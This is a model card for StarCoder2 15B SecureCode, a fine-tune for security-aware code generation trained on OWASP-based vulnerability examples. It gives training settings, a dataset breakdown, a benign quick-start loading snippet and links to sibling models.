StarCoder2 15B SecureCode

Parameters Dataset OWASP Method License

Open-source flagship security-aware code generation model. Fine-tuned on 2,185 real-world vulnerability examples covering OWASP Top 10 2021 and OWASP LLM Top 10 2025.

Dataset | Paper | Model Collection | perfecXion.ai | Blog Post


What This Model Does

StarCoder2 15B SecureCode generates security-aware code by teaching the model to recognize vulnerability patterns and produce secure implementations. Every training example includes:

  • Real-world incident grounding — Tied to documented CVEs and breach reports
  • Vulnerable + secure implementations — Side-by-side comparison
  • Attack demonstrations — Concrete exploit code
  • Defense-in-depth guidance — SIEM rules, logging, monitoring, infrastructure hardening

Model Details

Property Value
Base Model bigcode/starcoder2-15b-instruct-v0.1
Parameters 15B
Architecture GPT-2 (StarCoder2)
Method QLoRA (4-bit quantization + LoRA)
LoRA Rank 16
LoRA Alpha 32
Training Data scthornton/securecode (2,185 examples)
Training Time ~1h 40min
Hardware 2x NVIDIA A100 40GB (GCP)
Framework PEFT 0.18.1, Transformers 5.1.0, PyTorch 2.7.1

Quick Start

from transformers import AutoModelForCausalLM, AutoTokenizer
from peft import PeftModel

# Load base model + LoRA adapter
base_model = AutoModelForCausalLM.from_pretrained(
    "bigcode/starcoder2-15b-instruct-v0.1",
    device_map="auto",
    load_in_4bit=True
)
model = PeftModel.from_pretrained(base_model, "scthornton/starcoder2-15b-securecode")
tokenizer = AutoTokenizer.from_pretrained("scthornton/starcoder2-15b-securecode")

# Generate secure code
prompt = "Write a secure JWT authentication handler in Python with proper token validation"
inputs = tokenizer(prompt, return_tensors="pt").to(model.device)
outputs = model.generate(**inputs, max_new_tokens=512, temperature=0.7)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))

Training Details

Hyperparameter Value
Learning Rate 2e-4
Batch Size 1
Gradient Accumulation 16
Epochs 3
Scheduler Cosine
Warmup Steps 100
Optimizer paged_adamw_8bit
Max Sequence Length 2048

Dataset Breakdown

Component Examples Coverage
Web Security (OWASP Top 10:2021) 1,378 12 languages, 9 frameworks
AI/ML Security (OWASP LLM Top 10:2025) 750 Prompt injection, RAG poisoning, model theft
Framework-Specific Additions 219 Django, Flask, Express, Spring Boot, etc.
Total 2,185 Complete OWASP coverage

SecureCode Model Collection

Model Parameters Base Training Time Link
Llama 3.2 3B 3B Meta Llama 3.2 1h 5min scthornton/llama-3.2-3b-securecode
Qwen Coder 7B 7B Qwen 2.5 Coder 1h 24min scthornton/qwen-coder-7b-securecode
CodeGemma 7B 7B Google CodeGemma 1h 27min scthornton/codegemma-7b-securecode
DeepSeek Coder 6.7B 6.7B DeepSeek Coder 1h 15min scthornton/deepseek-coder-6.7b-securecode
CodeLlama 13B 13B Meta CodeLlama 1h 32min scthornton/codellama-13b-securecode
Qwen Coder 14B 14B Qwen 2.5 Coder 1h 19min scthornton/qwen2.5-coder-14b-securecode
StarCoder2 15B 15B BigCode StarCoder2 1h 40min This model
Granite 20B 20B IBM Granite Code 1h 19min scthornton/granite-20b-code-securecode

Citation

@misc{thornton2025securecode,
  title={SecureCode v2.0: A Production-Grade Dataset for Training Security-Aware Code Generation Models},
  author={Thornton, Scott},
  year={2025},
  publisher={perfecXion.ai},
  url={https://perfecxion.ai/articles/securecode-v2-dataset-paper.html},
  note={Model: https://huggingface.co/scthornton/starcoder2-15b-securecode}
}

Links


License

BigCode OpenRAIL-M

Downloads last month
3
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support

Model tree for scthornton/starcoder2-15b-securecode

Adapter
(1)
this model

Dataset used to train scthornton/starcoder2-15b-securecode

Collection including scthornton/starcoder2-15b-securecode

Paper for scthornton/starcoder2-15b-securecode